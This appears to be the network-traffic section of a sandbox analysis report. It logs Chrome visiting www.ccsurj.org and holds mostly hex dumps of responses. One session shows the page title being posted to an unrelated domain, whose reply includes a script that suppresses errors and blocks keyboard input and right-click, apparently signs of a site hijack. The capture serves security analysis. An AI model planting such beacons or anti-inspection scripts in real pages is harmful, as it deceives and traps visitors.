                                          2025-01-12 00:16:59 UTC16384INData Raw: 5f 78 11 51 d8 8d 73 8d b3 8e 9b 9c c9 07 51 5d bb 3d b7 68 eb 31 4a 7a 76 81 39 ca 5d b7 b9 5a 22 82 49 af 94 6c 9b f5 68 0e ac 34 aa d4 24 00 89 10 82 92 af 5d ab f8 51 34 c8 24 04 e5 6a c8 d3 ad 95 b6 f1 2b 6f dc 17 1d 4a d4 62 81 41 b9 67 53 a9 10 a4 b9 56 98 e3 04 e2 84 d7 8c 53 61 08 65 55 50 45 7a a2 2a 75 d7 62 8d 81 a0 af 4e d7 81 ba a6 75 08 73 29 c6 4d 4e 83 2e 09 82 ed 22 79 a7 1a 4e 9f f6 88 9a da 11 17 82 88 20 89 8e ed c8 63 fd d5 ce 89 4b 20 49 3a fc 93 56 a9 66 dd c9 e9 05 55 4f 74 d4 b2 8b 5b 53 1f 22 f7 4d 52 b5 98 51 e8 88 9f 54 d5 15 16 06 33 85 5c 7c d7 42 a0 5d f4 25 e9 8f d3 51 33 d9 6d 11 3f 12 17 d3 51 42 b3 1d f0 39 ff 00 3d 45 65 04 a3 9f 6c 7d 53 51 09 6a c4 e8 bd b4 48 08 52 d7 03 ad d4 b9 f8 c5 c3 3a 2a 82 3a cc 9a fc 67 a4
                                          Data Ascii: _xQsQ]=h1Jzv9]Z"Ilh4$]Q4$j+oJbAgSVSaeUPEz*ubNus)MN."yN cK I:VfUOt[S"MRQT3\|B]%Q3m?QB9=Eel}SQjHR:*:g
                                          2025-01-12 00:17:00 UTC16384INData Raw: b2 ee a8 7f 8e e6 ad 70 a6 eb 01 8c cc c5 98 90 e3 2c 67 54 90 0d 1c 98 ce 51 54 30 ba 38 99 77 80 93 50 fc b1 92 a8 9a 0d 14 e3 d4 4a a1 45 aa c1 71 15 43 9d 02 4b 6f 8a 2a 0f 55 e5 c9 16 7f 4f 56 ba 3c 27 03 7d 17 27 8a c2 35 ba 9e af 7b 32 d8 97 03 85 8c cc e2 0d ad 6b 54 7f 62 e2 85 16 97 70 6f 88 73 58 47 49 c2 7f 98 08 6d 87 57 10 76 aa eb 30 76 57 b8 5b 9a d7 24 39 c3 7c 5c 93 2e a9 c1 4b d9 8b 66 f0 7e de a5 d2 af 09 15 48 d4 b8 d4 bf d9 f9 d1 67 73 b6 49 37 64 6d 11 3d c8 a2 3b 57 0b df db 54 e7 31 c4 66 e4 89 90 bd a1 ca 1d b5 38 7f 59 7b 89 bc 3d a2 5d 7c 3d ac d1 1e a8 5c f4 c6 49 ca 85 3d c6 91 71 21 0d 7d 66 0a 3f 83 e7 ab 9e 9e 39 58 4d c2 90 ba 56 ba da a8 b6 e9 b3 2c 9a dd e5 75 f2 58 7e 1d 4e 4d 7a a3 f7 90 e4 1b 64 ab e6 9c ea bb 4b 1f
                                          Data Ascii: p,gTQT08wPJEqCKo*UOV<'}'5{2kTbposXGImWv0vW[$9|\.Kf~HgsI7dm=;WT1f8Y{=]|=\I=q!}f?9XMV,uX~NMzdK
                                          2025-01-12 00:17:00 UTC16384INData Raw: e6 8e 36 e2 22 a8 aa 89 0e 51 70 a8 a8 bf 54 c6 88 1b a5 96 d9 19 c6 ad 55 96 6d d4 57 65 9b 75 15 59 66 dd 5a bb 2d 61 75 6a 59 66 dd 52 96 5a db f4 d5 dd 4b 2d 63 56 a5 96 61 35 14 b2 d6 35 15 65 59 b7 51 5d 96 6d d4 52 cb 5b 75 14 b2 e7 67 d3 56 86 cb 5b 13 e5 a9 75 2c b1 43 e9 a9 75 32 ad 72 f5 2e af 2a da 0a 7c b5 2e ae cb 14 75 2e a5 96 6d 5f d3 52 ea ac b3 1a 97 57 65 ac 6a ee a6 55 9b 75 2e a5 96 b6 7d 75 2e aa cb 5b 35 2e ad 6b 6e ad 5e 55 bc 6a 29 95 6b 1a 8a ec 81 93 15 99 6c 3b 19 f6 d1 c6 9d 15 12 05 fa a6 3f a6 a9 42 12 44 3b 6a 8b 0e 8f 48 a1 a5 3a 2c 88 14 38 cd c4 a6 b6 fb 62 e2 b4 0d b7 ca 45 15 54 e8 aa 3d 32 9a 5c b0 b2 51 67 0b 85 6d bb 76 46 60 51 69 34 b2 47 20 53 e2 c5 74 5a 56 39 e2 09 cc 56 95 ce 77 2c 8f ba 8e f5 dd 85 d2 28 e8
                                          Data Ascii: 6"QpTUmWeuYfZ-aujYfRZK-cVa55eYQ]mR[ugV[u,Cu2r.*|.u.m_RWejUu.}u.[5.kn^Uj)kl;?BD;jH:,8bET=2\QgmvF`Qi4G StZV9Vw,(
                                          2025-01-12 00:17:00 UTC16384INData Raw: c6 ba f4 03 ea d4 cc 5d d1 11 33 f2 d6 65 b2 cb cf db f1 a1 9f c4 2b ca 49 00 fa ea b2 13 af 5f 81 e4 6d 3f a0 6b a7 00 f0 05 e7 ea 5d f5 85 48 9c 18 88 30 4b 88 f5 5c 6d 48 76 e2 80 9f b2 6f 74 49 53 f5 db a5 55 8f 08 f7 4f a1 3a bb d9 52 a9 54 b8 ae d3 22 0a 43 61 5e 79 a1 da 80 3b 0b 71 8a 7b 8e 17 df 5b 63 8c 2c 39 c8 e6 9e fc 4c af 57 6d fe 2a dd 8d 50 6b f5 da 1f 92 28 30 f9 70 25 ba cb 6b c8 86 c8 92 ed 45 c6 57 df 59 e1 a4 8a 46 dd c3 9a d9 35 44 8d 76 87 92 b2 c1 7a 5e 56 f7 85 db 76 fb 6e bf 2e 75 ed 56 ac 44 65 ea c5 58 1b a8 2a b2 f7 34 8c 39 72 10 87 04 0d 8e b0 f7 66 f1 f2 72 5b c5 49 14 f9 b9 a6 b5 36 ff 00 b8 6a 24 ab 58 b5 78 7b 39 d8 f4 6a a4 d6 ea 03 4c 18 af ee 62 03 ef 27 56 14 45 10 d4 76 92 7c 95 74 73 51 b5 ad d0 94 88 6b 33 9d 40
                                          Data Ascii: ]3e+I_m?k]H0K\mHvotISUO:RT"Ca^y;q{[c,9LWm*Pk(0p%kEWYF5Dvz^Vvn.uVDeX*49rfr[I6j$Xx{9jLb'VEv|tsQk3@
                                          2025-01-12 00:17:00 UTC16384INData Raw: 2b bd 95 32 e3 dc 39 51 ac 6a b5 2e cf ae d6 ad 57 6c f9 df 68 52 46 9c e8 1f 91 a8 92 f9 a3 61 fe 42 38 8e 38 fa 7a 49 b5 c9 22 74 dd af 8b 76 c3 18 fa 26 aa 1a 3a 76 0e 08 df a6 ab b9 87 d3 32 48 9c e7 ef 65 05 5a f3 a2 4a ba 38 a7 78 57 6c 5b 57 ed 1a db 54 58 74 7b 4d 6a 6e 4d 78 45 e6 49 24 b2 6c 6e d8 db 46 6e f3 11 bd ab b1 7d 3b 93 5e 0f b4 55 ec 99 91 b2 9d a5 82 f7 71 b6 9e e0 ad 54 ac 3a 17 9b 9b 26 7d 1e e0 b6 6b 13 8d 86 ab d2 44 d6 a2 e4 0b 63 ca b2 ed 3e 9c 4c 32 47 cc 36 c0 b6 22 b3 f7 2a 03 d7 2a ba e2 d4 d0 54 30 79 41 b8 b9 be a7 d3 5e 45 3a f7 3b a7 a7 10 6e 09 cd 42 b7 ac 6a 35 2e 64 39 37 d4 67 12 d2 8c c3 2a a6 8e bc f3 60 12 17 96 a8 ad 88 8b 9b d3 3d f5 87 09 a3 ce e7 4d 23 ae 23 3e 2b 9f c1 36 5b e5 d0 6e a2 ab c6 af 2e 81 7c 85
                                          Data Ascii: +29Qj.WlhRFaB88zI"tv&:v2HeZJ8xWl[WTXt{MjnMxEI$lnFn};^UqT:&}kDc>L2G6"**T0yA^E:;nBj5.d97g*`=M##>+6[n.|
                                          2025-01-12 00:17:00 UTC16384INData Raw: 3d 5c e4 13 8b 31 aa cc f8 71 8e 0b 26 e2 92 88 88 ac 52 69 ac 11 7f db 49 9e e6 3f f7 49 ac 55 5e 75 d4 c3 b5 62 b4 5f 3f eb ac cb a0 99 7c 49 73 67 0d b8 84 b8 cf fe af 4d 1f fb e2 83 ff 00 1d 36 11 77 b7 dd 22 a8 da 27 1f 45 e4 b5 6a 23 2d d0 a9 cd ed 0f bc 65 c1 ed df b0 26 bd 25 4e 81 78 4a 2f 13 95 98 e3 bf 99 87 c4 ea 65 36 04 e9 90 09 9a 0d 0e 12 f9 57 8d a5 4c 86 7f d9 aa 2f e3 d7 1e 8e 36 96 9b 8b af 45 88 48 e6 c8 32 9e 49 26 b3 5e af c1 72 84 e5 2e e3 b8 20 93 8e 57 d5 54 25 bb d5 b6 ea 9c 96 13 a9 2f 46 d1 a5 41 f9 6a 32 96 37 38 82 12 e4 ab 90 30 58 f5 53 a4 2a 95 78 38 61 c4 5b 8b ed c9 73 6a f4 6a bc 78 94 49 b2 d0 25 2b 00 91 e3 ef 11 17 84 c1 72 6e 92 ae 51 7f cb 59 05 0b 4c ed 8f 92 dc 6b 9c da 57 cb cc 26 1d 3e e8 b9 2a b0 2e 93 9f fb
                                          Data Ascii: =\1q&RiI?IU^ub_?|IsgM6w"'Ej#-e&%NxJ/e6WL/6EH2I&^r. WT%/FAj2780XS*x8a[sjjxI%+rnQYLkW&>*.
                                          2025-01-12 00:17:00 UTC16384INData Raw: 6b 48 54 41 25 59 88 ef 56 d9 d9 cc 26 08 05 3e 14 e9 a3 4c 4e 10 a8 96 11 15 89 3b f1 eb 3c 8e cc fe 5a 2d d4 cc b9 5a ac c4 20 56 63 a1 08 b8 9c d4 5e fb 7d f1 a1 b3 ae ac bc 23 3b b3 b8 93 dd 73 ad c9 29 05 b5 db 3a 69 bf 19 cf df 97 29 cd ab 85 15 44 44 5d 21 db aa 08 f4 aa ac 16 49 96 b7 38 8f 49 f4 b0 82 06 b9 2f 96 51 30 9f ae 81 c5 32 ea a5 71 ba b0 54 71 ae d4 6a 34 2a cd 5e 95 70 d0 ce 80 fb 50 11 4a 4b 64 8f 8c a0 28 ed 20 12 b8 66 a1 b7 ae 04 53 d4 ab ac e5 f6 4a 73 55 7e f0 f7 c5 bb 72 25 7a bb e6 e8 57 55 ab 51 a8 b5 1e 03 b5 3b 8a 3b 6d c5 11 47 77 93 60 6d 8f c6 bf c6 b8 14 f9 ea 47 28 72 99 32 15 e9 35 3a e7 a1 a3 70 76 d6 e9 e9 f6 9b c9 1a 9c 1c f0 25 7d d5 12 3e 5b 7b 15 72 bb 40 97 f4 d6 90 f0 98 12 e8 49 19 4a 6e a6 55 37 6d ca af cb
                                          Data Ascii: kHTA%YV&>LN;<Z-Z Vc^}#;s):i)DD]!I8I/Q02qTqj4*^pPJKd( fSJsU~r%zWUQ;;mGw`mG(r25:pv%}>[{r@IJnU7m
                                          2025-01-12 00:17:00 UTC16384INData Raw: ae 21 b8 a2 00 4a ab b9 44 75 d5 78 86 9e 32 f3 ba 57 07 c5 72 a7 7a 0d a7 6a 44 84 ed 85 ce b5 e9 f5 2f b4 a0 56 ab 32 ea b2 44 e7 4c 05 22 6a 2d 35 a5 11 6d 5b 23 17 c8 5e 46 b3 ea 4e e9 b7 3a f3 f3 d6 4c e3 c5 dd bb 0b 72 f5 4d 3a d8 ae ab 9c 3b 8b 5d 83 7a 47 2b 7a b5 12 7d 97 4b 95 2e 2d 1d c7 5b 83 48 a6 cc 07 95 1c 84 d9 02 6f 7d d6 c3 aa 6f 35 ce 15 35 29 b1 63 01 8f c4 2c e7 5b fd c7 d6 dd 15 31 ce 03 45 51 24 13 25 85 68 c3 97 f8 3a 60 95 3e 6b ed af a0 05 d3 06 e1 16 ec 39 15 5f d1 34 4a d3 9a c8 a2 39 75 5e 76 95 b4 1b 88 ee 0a d4 0a 72 74 ca e2 4c 90 6c ba 7d 05 57 5d 2c 21 99 aa 1b e9 af c9 2a 67 78 0a fa 46 30 40 f4 34 89 cb 6f d2 da 7f 74 7a 26 ba ef 37 24 af 06 e3 a9 5c 7a 91 30 88 9f 96 80 94 0b cc 5f 16 9b ee 0e 2d 14 54 74 d6 3d 06 9c
                                          Data Ascii: !JDux2WrzjD/V2DL"j-5m[#^FN:LrM:;]zG+z}K.-[Ho}o55)c,[1EQ$%h:`>k9_4J9u^vrtLl}W],!*gxF0@4otz&7$\z0_-Tt=
                                          2025-01-12 00:17:00 UTC16384INData Raw: 95 95 c4 e0 d4 eb 7e 91 c1 e9 f1 98 a8 30 76 e5 12 ab 3d 52 bd 21 81 61 15 95 95 b5 c9 62 df 54 54 29 0e ae cf 90 e3 eb ae bf 04 cd 16 57 05 c5 ac 93 87 31 75 f7 0a 47 62 f5 b2 7e cc b8 84 ab fc 88 f5 7a f2 db 71 6a 66 d0 83 4c cf fb 38 c8 7a a6 0d 01 4f 6e d3 5f 88 b1 b7 3a ba 9a 56 54 b7 86 7c b7 fe 05 9a 0a 87 42 73 0d ff 00 9a a8 d7 c3 c1 48 83 1a 2c 77 e6 1b f5 58 81 5c a5 57 dd 8c fb 86 91 fc bb c8 5c 9f 41 e1 c9 0a 8b 97 48 b2 b9 e8 9d 74 f8 f0 e8 1f e1 c9 e1 4b 7d 5c ad fb 5a a9 f2 e0 9d 44 4a c5 3e 9d 56 96 4b 50 88 dc c7 e4 3f 0c c0 51 63 30 00 e0 24 c1 2d a2 7b 79 a8 6b d8 97 28 ab 9d 70 7e 84 e1 4f 9e 21 76 83 e5 77 3f 65 d5 38 86 68 f2 bc f8 88 dc 72 50 7d e7 76 5d 90 ec 56 ea 7c 3a 9b 46 a9 5b b0 e9 94 5b 82 95 5f 75 b5 48 aa 65 31 c0 f5 c1
                                          Data Ascii: ~0v=R!abTT)W1uGb~zqjfL8zOn_:VT|BsH,wX\W\AHtK}\ZDJ>VKP?Qc0$-{yk(p~O!vw?e8hrP}v]V|:F[[_uHe1


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          23192.168.2.449773154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:59 UTC375OUTGET /system/resource/js/calendar/simple.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:00 UTC351INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:59 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 9191
                                          Last-Modified: Fri, 10 Jan 2025 07:04:21 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "6780c675-23e7"
                                          Expires: Tue, 11 Feb 2025 00:16:59 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:00 UTC9191INData Raw: 66 75 6e 63 74 69 6f 6e 20 53 69 6d 70 6c 65 5f 43 61 6c 65 6e 64 61 72 28 29 0d 0a 7b 0d 0a 20 20 20 76 61 72 20 20 20 20 63 61 6c 5f 43 61 6c 65 6e 64 61 72 43 61 6c 65 6e 64 61 72 44 61 74 61 3d 6e 65 77 20 20 20 20 41 72 72 61 79 28 32 30 29 3b 20 20 20 20 20 0d 0a 20 20 20 76 61 72 20 20 20 20 63 61 6c 5f 43 61 6c 65 6e 64 61 72 6d 61 64 64 3d 6e 65 77 20 20 20 20 41 72 72 61 79 28 31 32 29 3b 20 20 20 20 20 0d 0a 20 20 20 76 61 72 20 20 20 20 63 61 6c 5f 43 61 6c 65 6e 64 61 72 54 68 65 44 61 74 65 3d 6e 65 77 20 20 20 20 44 61 74 65 28 29 3b 20 20 20 20 20 0d 0a 20 20 20 76 61 72 20 20 20 20 63 61 6c 5f 43 61 6c 65 6e 64 61 72 74 67 53 74 72 69 6e 67 3d 22 e7 94 b2 e4 b9 99 e4 b8 99 e4 b8 81 e6 88 8a e5 b7 b1 e5 ba 9a e8 be 9b e5 a3 ac e7 99 b8 22
                                          Data Ascii: function Simple_Calendar(){ var cal_CalendarCalendarData=new Array(20); var cal_Calendarmadd=new Array(12); var cal_CalendarTheDate=new Date(); var cal_CalendartgString=""


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          24192.168.2.449768103.235.46.964435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:59 UTC593OUTGET /img/baidu_jgylogo3.gif HTTP/1.1
                                          Host: www.baidu.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:59 UTC499INHTTP/1.1 200 OK
                                          Accept-Ranges: bytes
                                          Cache-Control: max-age=315360000
                                          Content-Length: 705
                                          Content-Type: image/gif
                                          Date: Sun, 12 Jan 2025 00:16:59 GMT
                                          Etag: "2c1-4a6473f6030c0"
                                          Expires: Wed, 10 Jan 2035 00:16:59 GMT
                                          Last-Modified: Wed, 22 Jun 2011 06:40:43 GMT
                                          P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                          Server: Apache
                                          Set-Cookie: BAIDUID=18C41BFB53904CF6DC8787FBDF054588:FG=1; expires=Mon, 12-Jan-26 00:16:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                          Connection: close
                                          2025-01-12 00:16:59 UTC680INData Raw: 47 49 46 38 39 61 75 00 26 00 a2 00 00 e6 32 2f ea d4 e2 59 60 e8 99 9d f1 ef 76 74 29 32 e1 e1 06 02 ff ff ff 21 f9 04 00 00 00 00 00 2c 00 00 00 00 75 00 26 00 00 03 ff 78 ba dc fe 30 b6 20 4a 19 30 04 c9 bb ff 60 c8 55 56 21 4c a4 b0 89 6c eb be cb 50 96 eb 11 cc 56 0d ef 7c 7f e0 96 93 82 34 c3 f8 8e 48 d0 0d 28 94 01 0b c9 a8 f4 b1 04 0e 9f 05 dd 74 7b ac e2 14 d8 2c 77 8c 7c 0a b1 42 b2 5a a4 61 10 4b c6 37 7c 4d f7 50 68 0a af 25 f6 d4 d6 ff 6e 38 46 4e 26 3a 40 46 80 89 7c 56 31 7e 77 85 79 03 92 8a 7f 72 16 88 20 84 39 94 6b 68 6c 4f 9c 6a 9e 21 9a 73 a1 5c a3 0c 1a 6d 0e 96 26 a7 5c ae 98 8f 41 5a ae 50 51 04 ba 7e 7f a5 9b 79 58 98 b7 52 06 c5 bc c5 c8 c9 06 00 00 04 bc 1f 00 c8 57 45 0b 7a 38 35 ae 27 ca db dc 06 0a d1 dd e1 e0 e1 c8 04 2e e3
                                          Data Ascii: GIF89au&2/Y`vt)2!,u&x0 J0`UV!LlPV|4H(t{,w|BZaK7|MPh%n8FN&:@F|V1~wyr 9khlOj!s\m&\AZPQ~yXRWEz85'.
                                          2025-01-12 00:16:59 UTC25INData Raw: 0e 74 12 01 f5 1c 98 48 4b 26 bc 04 a2 16 01 b4 44 c4 4b 10 ad 91 00 00 3b
                                          Data Ascii: tHK&DK;


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          25192.168.2.449774122.10.26.2024435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:59 UTC641OUTPOST /wdzmr.php HTTP/1.1
                                          Host: vkg.hpdbfezgrqwn.vip
                                          Connection: keep-alive
                                          Content-Length: 189
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-platform: "Windows"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Content-Type: application/x-www-form-urlencoded;charset=UTF-8;
                                          Accept: */*
                                          Origin: https://www.ccsurj.org
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:59 UTC189OUTData Raw: 74 69 74 6c 65 3d 25 45 39 25 41 36 25 39 36 25 45 39 25 41 31 25 42 35 2d 2d 25 45 34 25 42 38 25 38 30 25 45 37 25 41 42 25 39 45 25 45 36 25 38 41 25 38 30 25 45 35 25 41 45 25 39 38 25 45 37 25 42 44 25 39 31 2d 44 4f 54 41 32 25 32 43 4c 4f 4c 25 32 43 43 53 47 4f 25 45 36 25 42 38 25 42 38 25 45 36 25 38 38 25 38 46 25 45 38 25 42 35 25 39 42 25 45 34 25 42 41 25 38 42 25 45 35 25 38 46 25 38 41 25 45 35 25 39 30 25 38 34 25 45 37 25 41 37 25 38 44 25 45 38 25 42 35 25 39 42 25 45 34 25 42 41 25 38 42 25 45 37 25 41 42 25 39 45 25 45 37 25 38 43 25 39 43
                                          Data Ascii: title=%E9%A6%96%E9%A1%B5--%E4%B8%80%E7%AB%9E%E6%8A%80%E5%AE%98%E7%BD%91-DOTA2%2CLOL%2CCSGO%E6%B8%B8%E6%88%8F%E8%B5%9B%E4%BA%8B%E5%8F%8A%E5%90%84%E7%A7%8D%E8%B5%9B%E4%BA%8B%E7%AB%9E%E7%8C%9C
                                          2025-01-12 00:17:00 UTC339INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:59 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Request-ID: fe79e2197ab9891d0001b4dad3098706
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Headers: *
                                          Strict-Transport-Security: max-age=31536000
                                          2025-01-12 00:17:00 UTC679INData Raw: 32 39 62 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 56 5f 50 41 54 48 3d 22 2f 22 3b 77 69 6e 64 6f 77 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 20 72 65 74 75 72 6e 20 74 72 75 65 3b 20 7d 3b 64 6f 63 75 6d 65 6e 74 2e 6f 6e 6b 65 79 64 6f 77 6e 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 6f 6e 6b 65 79 75 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 6f 6e 6b 65 79 70 72 65 73 73 20 3d 20 6e 65 77 20 46 75 6e 63 74 69 6f 6e 28 22 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 29 3b 64 6f 63 75 6d 65 6e 74 2e 6f 6e 63 6f 6e 74 65 78 74 6d 65 6e 75 20 3d 20 6e 65 77 20 46 75 6e 63 74 69 6f 6e 28 22 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69
                                          Data Ascii: 29b<html><head><script>var V_PATH="/";window.onerror=function(){ return true; };document.onkeydown = document.onkeyup = document.onkeypress = new Function("return false;");document.oncontextmenu = new Function("return false;");</script><meta name="vi


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          26192.168.2.44977243.153.236.1474435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:59 UTC608OUTGET /web/index/images/logo_440x140.v.4.png HTTP/1.1
                                          Host: www.sogou.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:00 UTC905INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:59 GMT
                                          Content-Type: image/png
                                          Content-Length: 2950
                                          Connection: close
                                          Last-Modified: Mon, 19 Aug 2024 09:14:31 GMT
                                          Set-Cookie: ABTEST=0|1736641019|v17; expires=Tue, 11-Feb-25 00:16:59 GMT; path=/
                                          P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                          Set-Cookie: IPLOC=US; expires=Mon, 12-Jan-26 00:16:59 GMT; domain=.sogou.com; path=/
                                          P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                          Set-Cookie: SUID=BD7B2E085EA7A20B00000000678309FB; expires=Sat, 07-Jan-2045 00:16:59 GMT; domain=.sogou.com; path=/
                                          P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                          ETag: "66c30cf7-b86"
                                          Expires: Fri, 11 Jul 2025 00:16:59 GMT
                                          Cache-Control: max-age=15552000
                                          UUID: 31634bbc-3d06-4b99-a489-27820dd1d99f
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:00 UTC2950INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 b8 00 00 00 8c 08 03 00 00 00 39 88 4c 8e 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 7b 50 4c 54 45 47 70 4c 53 56 59 53 56 59 53 56 59 53 56 59 53 56 59 ff 75 1b 53 56 59 b3 63 38 53 56 59 ff 73 1a 53 56 59 53 56 59 53 56 59 53 56 59 53 56 59 53 56 59 ff 77 1d ff 70 18 ff 72 19 ff 7f 22 ff 84 26 ff 65 0f ff 66 10 53 56 59 ff 62 0d ff 62 0d ff 6c 14 ff 87 28 ff 84 26 53 56 59 fe 69 12 ff 6f 17 ff 8d 2d ff 7c 20 ff 76 1b ff 81 24 fe 63 0d fe 56 04 ff 86 27 fe 5d 09 f6 58 00 3f 00 00 00 1e 74 52 4e 53 00 12 4c 96 f7 c2 15 ef 08 3c 5d 7e ad 66 d3 2a e2 71 49 30 e5 90 8a a4 1c d1 e8 bd d4 b3 ad 02 03 e5 00 00 0a 7f 49 44 41 54 78 da ed 9d e9 7a a2 4a
                                          Data Ascii: PNGIHDR9LgAMAasRGB{PLTEGpLSVYSVYSVYSVYSVYuSVYc8SVYsSVYSVYSVYSVYSVYSVYwpr"&efSVYbbl(&SVYio-| v$cV']X?tRNSL<]~f*qI0IDATxzJ


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          27192.168.2.449776154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:00 UTC612OUTGET /images/21/11/25/1p6vg4xelj/banner-2.jpg HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:01 UTC304INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:00 GMT
                                          Content-Type: image/jpeg
                                          Content-Length: 333374
                                          Last-Modified: Fri, 10 Jan 2025 07:04:24 GMT
                                          Connection: close
                                          ETag: "6780c678-5163e"
                                          Expires: Tue, 11 Feb 2025 00:17:00 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
